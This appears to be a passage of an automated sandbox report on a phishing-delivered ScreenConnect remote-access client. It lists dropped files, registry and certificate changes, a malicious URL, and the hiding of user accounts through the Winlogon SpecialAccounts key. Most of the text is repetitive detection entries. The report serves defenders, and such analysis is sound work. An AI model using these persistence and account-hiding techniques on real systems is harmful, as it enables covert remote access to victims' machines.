              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A346A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1943559410.0000000002E62000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 00000014.00000002.2409619705.0000000003041000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000015.00000002.2004992616.00000000010D0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000015.00000002.2005207241.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll0.14.dr, ScreenConnect.ClientService.dll.14.dr
              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000012.00000000.1939664334.00000000007FD000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.ClientService.exe0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1949508964.000000001BB02000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll.14.dr, ScreenConnect.Windows.dll0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1946388041.00000000028C2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll0.14.dr, ScreenConnect.Client.dll.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb] source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1946388041.00000000028C2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll0.14.dr, ScreenConnect.Client.dll.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbY/ source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A329F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1944397148.0000000005402000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.14.dr, ScreenConnect.Core.dll.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A329F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1944397148.0000000005402000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.14.dr, ScreenConnect.Core.dll.14.dr
              Source: ScreenConnect.ClientService.dll.14.drStatic PE information: 0xF0DD68C1 [Mon Jan 20 07:41:53 2098 UTC]
              Source: chromecache_128.1.drStatic PE information: real checksum: 0x177d1 should be: 0x175ce
              Source: bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp.0.drStatic PE information: real checksum: 0x177d1 should be: 0x48de
              Source: Unconfirmed 974768.crdownload.0.drStatic PE information: real checksum: 0x177d1 should be: 0x175ce

              Persistence and Installation Behavior

              barindex
              AI detected suspicious URL
              Source: EmailJoeBoxAI: AI detected Brand spoofing attempt in URL: URL: https://cp9856.chelokipotlester.icu
              Source: EmailJoeBoxAI: AI detected Typosquatting in URL: URL: https://cp9856.chelokipotlester.icu
              Source: EmailJoeBoxAI: AI detected suspicious URL: URL: https://cp9856.chelokipotlester.icu
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\support.Client.exe (copy)Jump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exeJump to dropped file
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 128Jump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\ScreenConnect.Windows.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\Unconfirmed 974768.crdownloadJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\ScreenConnect.Core.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\ScreenConnect.ClientService.dllJump to dropped file
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmpJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\ScreenConnect.Client.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.ClientService.exeJump to dropped file
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 128
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 128Jump to dropped file
              Source: ScreenConnect.ClientService.dll0.14.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
              Source: ScreenConnect.ClientService.dll.14.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (5999b697-2fc8-47f6-a1dc-4d0d274c363e)
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Contains functionality to hide user accounts
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1949508964.000000001BB02000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: ScreenConnect.ClientService.exe, 00000012.00000002.1943559410.0000000002E62000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
              Source: ScreenConnect.WindowsClient.exe, 00000014.00000002.2409619705.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
              Source: ScreenConnect.WindowsClient.exe, 00000015.00000002.2004992616.00000000010D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
              Source: ScreenConnect.WindowsClient.exe, 00000015.00000002.2005207241.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
              Source: ScreenConnect.Windows.dll.14.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: ScreenConnect.ClientService.dll0.14.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
              Source: ScreenConnect.Windows.dll0.14.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: ScreenConnect.ClientService.dll.14.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
              Source: C:\Users\user\Downloads\support.Client.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
